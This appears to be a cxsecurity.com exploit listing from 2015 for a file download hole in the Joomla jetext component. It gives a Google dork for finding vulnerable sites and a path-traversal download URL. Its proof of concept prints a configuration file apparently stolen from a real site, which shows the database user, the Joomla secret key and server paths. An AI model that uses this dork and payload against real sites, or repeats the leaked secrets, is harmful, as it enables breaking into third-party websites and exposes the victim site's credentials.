Joomla jetext LFD

2015.10.05
Credit: Đầu Lâu
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: Joomla jetext LFD # Google Dork: inurl:option=com_jetext # Date: 03/10/2015 # Exploit Author: Đầu Lâu # Vendor Homepage: don't have :(( # Version: all version # Tested on: kali linux link vuln: site:/index.php?option=com_jetext&task=download&file=[../../index.php] POC: <?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.'; public $sitename = 'Cong doan'; public $editor = 'tinymce'; public $list_limit = '20'; public $access = '1'; public $debug = '0'; public $debug_lang = '0'; public $dbtype = 'mysql'; public $host = 'localhost'; public $user = 'congdoanth'; public $password = 'xxx'; public $db = 'ldldth_2014'; public $dbprefix = 'jos_'; public $live_site = ''; public $secret = 'iGwM7scVp9QCRhxt'; public $gzip = '0'; public $error_reporting = '-1'; public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}'; public $ftp_host = '127.0.0.1'; public $ftp_port = '21'; public $ftp_user = ''; public $ftp_pass = ''; public $ftp_root = ''; public $ftp_enable = '0'; public $offset = 'UTC'; public $offset_user = 'UTC'; public $mailer = 'mail'; public $mailfrom = 'admin@localhost.com'; public $fromname = 'Cong doan'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = '0'; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = '25'; public $caching = '0'; public $cache_handler = 'file'; public $cachetime = '15'; public $MetaDesc = ''; public $MetaKeys = ''; public $MetaTitle = '1'; public $MetaAuthor = '1'; public $sef = '1'; public $sef_rewrite = '0'; public $sef_suffix = '0'; public $unicodeslugs = '0'; public $feed_limit = '10'; public $log_path = 'C:\xampp\htdocs\congdoan\logs'; public $tmp_path = 'C:\xampp\htdocs\congdoan\tmp'; public $lifetime = '15'; public $session_handler = 'database'; public $MetaRights = ''; public $sitename_pagetitles = '0'; public $force_ssl = '0'; public $feed_email = 'author'; public $cookie_domain = ''; public $cookie_path = ''; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top